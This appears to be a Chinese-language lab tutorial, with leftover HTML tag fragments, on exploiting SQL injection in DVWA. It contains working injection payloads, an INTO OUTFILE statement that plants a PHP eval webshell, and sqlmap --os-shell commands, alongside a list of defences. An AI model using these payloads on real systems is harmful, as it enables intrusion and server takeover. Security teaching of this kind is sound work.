MySQL注入到GetShell实战教学文档<\/h1>

一、环境搭建<\/h2>

1.1 所需工具<\/h3>

Xampp集成环境（Apache+MySQL+PHP）<\/li>

DVWA（Damn Vulnerable Web Application）压缩包<\/li> <\/ul>

1.2 安装步骤<\/h3>

安装并启动Xampp

如Apache启动失败，修改config文件端口为未占用端口（如4433和8081）<\/li> <\/ul> <\/li>
解压DVWA到Xampp的htdocs目录下<\/li>

访问DVWA登录页面完成环境搭建<\/li> <\/ol>

二、手工注入到GetShell<\/h2>

2.1 注入点探测<\/h3>

输入1<\/code>查询成功<\/li>
输入1' and '1'='2<\/code>查询失败<\/li>

输入1' or '1234'='1234<\/code>查询成功

确认存在SQL注入漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
2.2 UNION查询利用<\/h3>

基础UNION查询测试：
1<\/span>' union select 1,2'<\/span>
<\/span><\/span><\/code><\/pre>
返回两个SELECT语句的结果<\/li>
<\/ul>
<\/li>
<\/ol>
2.3 写入WebShell<\/h3>


尝试写入PHP一句话木马：<\/p>
1<\/span>' union select 1,'<\/span><?<\/span>php @<\/span>eval($<\/span>_POST['pass'<\/span>]) ?><\/span>' into outfile '<\/span>C<\/span>:\/<\/span>xampp\/<\/span>htdocs\/<\/span>dvwa\/<\/span>1<\/span>.php' #
<\/span><\/span><\/span><\/code><\/pre>
可能因单引号问题报错<\/li>
<\/ul>
<\/li>

修正后的写入语句（使用双引号）：<\/p>
1<\/span>' union select 1,'<\/span><?<\/span>php @<\/span>eval($<\/span>_POST["pass"<\/span>]) ?><\/span>' into outfile '<\/span>C<\/span>:\/<\/span>xampp\/<\/span>htdocs\/<\/span>dvwa\/<\/span>1<\/span>.php' #
<\/span><\/span><\/span><\/code><\/pre>
成功在网站目录下创建1.php文件<\/li>
<\/ul>
<\/li>

使用中国菜刀等工具连接WebShell<\/p>
<\/li>
<\/ol>
三、使用SQLMap自动化攻击<\/h2>
3.1 基本注入检测<\/h3>
sqlmap -u "http:\/\/127.0.0.1:8081\/dvwa\/vulnerabilities\/sqli\/?id=1&Submit=Submit#"<\/span>
<\/span><\/span><\/code><\/pre>
需添加cookie参数绕过登录验证<\/li>
<\/ul>
3.2 获取交互式Shell<\/h3>
sqlmap -u [<\/span>URL]<\/span> --cookie=<\/span>"[COOKIE]"<\/span> --os-shell
<\/span><\/span><\/code><\/pre>
选择PHP作为脚本语言<\/li>
选择自定义上传位置<\/li>
输入网站绝对路径（Windows需转义）：
C:\\xampp\\htdocs\\dvwa
<\/code><\/pre>
<\/li>
<\/ol>
3.3 上传WebShell<\/h3>

SQLMap会自动上传两个PHP文件<\/li>
通过上传点上传自定义PHP木马文件<\/li>
使用中国菜刀连接获取Shell<\/li>
<\/ol>
四、关键知识点<\/h2>
4.1 MySQL文件操作函数<\/h3>

load_file()<\/code>: 读取文件内容<\/li>
into outfile<\/code>: 写入文件到服务器<\/li>
<\/ul>
4.2 注入技巧<\/h3>

单引号闭合问题处理<\/li>
UNION查询的列数匹配<\/li>
绝对路径获取方法<\/li>
<\/ul>
4.3 权限要求<\/h3>

MySQL用户需有文件读写权限<\/li>
知道网站绝对路径<\/li>
无目录写入限制<\/li>
<\/ul>
五、防御措施<\/h2>

最小权限原则：限制MySQL用户权限<\/li>
禁用危险函数：secure_file_priv<\/code>限制文件操作<\/li>
输入过滤：使用预处理语句<\/li>
Web目录不可写或严格权限控制<\/li>
部署WAF防护SQL注入攻击<\/li>
<\/ol>
六、注意事项<\/h2>

本文仅用于合法授权测试和学习<\/li>
真实环境通常有更多防护措施<\/li>
Linux环境下需考虑权限和路径差异<\/li>
高安全级别DVWA环境需调整安全等级测试<\/li>
<\/ol>
七、扩展学习<\/h2>

Linux环境下反弹Shell技术<\/li>
绕过WAF的注入技巧<\/li>
权限提升方法<\/li>
日志清理技术<\/li>
<\/ol>
通过本教程，学习者可以全面了解从SQL注入到GetShell的完整过程，建议在虚拟机环境中实践，避免对真实系统造成影响。<\/p>